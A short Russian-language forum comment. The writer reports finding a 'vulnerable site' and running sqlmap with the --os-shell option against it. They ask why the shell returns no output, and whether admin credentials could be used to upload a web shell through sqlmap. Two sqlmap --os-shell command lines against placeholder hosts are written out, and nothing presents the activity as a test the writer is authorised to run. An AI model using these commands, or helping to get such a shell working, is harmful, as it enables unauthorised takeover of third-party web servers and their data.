Ребята я понимаю что статья старая но я тоже столкнулся с этой ситуацией. Нашёл уязвимый сайт

sqlmap -u http://www.site.ru/gallery.php?action=35 --os-shell

он мне тоже сразу выдал



не запрашивал

1.asp

2.php

3. и тд

Далее при вводе dir выдаёт No output

Подскажите что делать дальше?

И ещё вопрос если есть логин и пароль от админки возможно ли как не будь залить shell не через админку а с помощью sqlmap -пом? спрашиваю как пример sqlmap -u http://site.ru/index.php?id=1 --os-shell login и pass